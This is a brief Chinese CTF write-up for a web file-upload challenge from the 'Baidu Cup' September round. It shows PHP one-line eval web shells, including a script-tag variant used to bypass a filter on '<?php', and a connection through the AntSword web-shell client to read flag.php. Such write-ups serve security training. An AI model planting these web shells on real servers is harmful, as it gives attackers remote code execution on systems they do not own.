“百度杯”CTF比賽 九月場
Upload:
型別:web
題目描述:想怎麼傳就怎麼傳,就是這麼任性。tips:flag在flag.php中
解題方法:開啟靶機,獲得題目連結是一個檔案上傳型別的:
看到檔案上傳,就想到一句話木馬,先上傳一個一句話木馬上去:
<?php @eval ($_POST["1"]);?>
上傳成功,我們點選這個上傳成功的連結:
這裡發現我們的<?php被過濾了,所以我們要用其他的php標記手法:
<script language="PHP">
@eval($_POST["pass"]);//php長標籤
</script>
然後現在我們再上傳我們的一句話木馬
上傳成功後再點選上傳成功的連結,返回的是一片空白,說明我們的一句話木馬上傳成功了
現在用中國蟻劍來連:
連線成功!
在目錄下找到flag.php